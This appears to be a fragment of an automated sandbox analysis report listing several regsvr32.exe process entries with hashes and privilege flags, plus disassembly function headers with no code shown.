MD5 hash: | 59BCE9F07985F8A4204F4D6554CFF708 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 20:51:07 |
Start date: | 02/12/2021 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xff3d0000 |
File size: | 19456 bytes |
MD5 hash: | 59BCE9F07985F8A4204F4D6554CFF708 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 20:51:08 |
Start date: | 02/12/2021 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xff3d0000 |
File size: | 19456 bytes |
MD5 hash: | 59BCE9F07985F8A4204F4D6554CFF708 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 20:51:08 |
Start date: | 02/12/2021 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xff3d0000 |
File size: | 19456 bytes |
MD5 hash: | 59BCE9F07985F8A4204F4D6554CFF708 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 20:51:08 |
Start date: | 02/12/2021 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xff3d0000 |
File size: | 19456 bytes |
MD5 hash: | 59BCE9F07985F8A4204F4D6554CFF708 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Disassembly |
---|
Code Analysis |
---|
Executed Functions |
---|
Non-executed Functions |
---|
Function 021966F3, Relevance: .8, Instructions: 775COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 021966E8, Relevance: .8, Instructions: 763COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 02196753, Relevance: .8, Instructions: 757COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 02196743, Relevance: .7, Instructions: 738COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 02197820, Relevance: .5, Instructions: 514COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 02196340, Relevance: .4, Instructions: 365COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |